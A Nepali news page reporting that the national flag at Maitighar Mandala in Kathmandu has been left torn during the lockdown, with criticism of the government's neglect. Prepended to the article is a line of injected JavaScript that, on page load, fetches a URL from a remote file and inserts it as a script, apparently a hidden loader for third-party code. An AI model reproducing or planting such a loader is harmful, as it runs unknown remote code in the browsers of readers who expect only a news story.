;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जेठ १६,
काठमाडौँ | काठमाडौँको माइतीघर मण्डलामा राखिएको नेपालको राष्ट्रिय झण्डा च्यातिएर झुदा झुदा भएको छ | लक डाउनले गर्दा लामो समय सम्म कसैको आखा नपरेको यो झन्डामा जुनेली न्युजको आखा परेको छ |
सरकारले रमझमको लागि करोडौको पम प्लेट पोल भरि राख्न सक्छा तर राष्ट्रिय गौरब बोकेको कपडाको झण्डा फेर्न सक्दैन |
काठमाडौँको बीच भागमा रहेको यो झण्डा हावाले फररर हल्लिनु पर्ने तर कुनै पिडा पर्दा हाम्रो मन चिरीए झैँ च्यातिएरा चिरा चिरा भएको छ |
फेसबुक प्रतिक्रियाहरु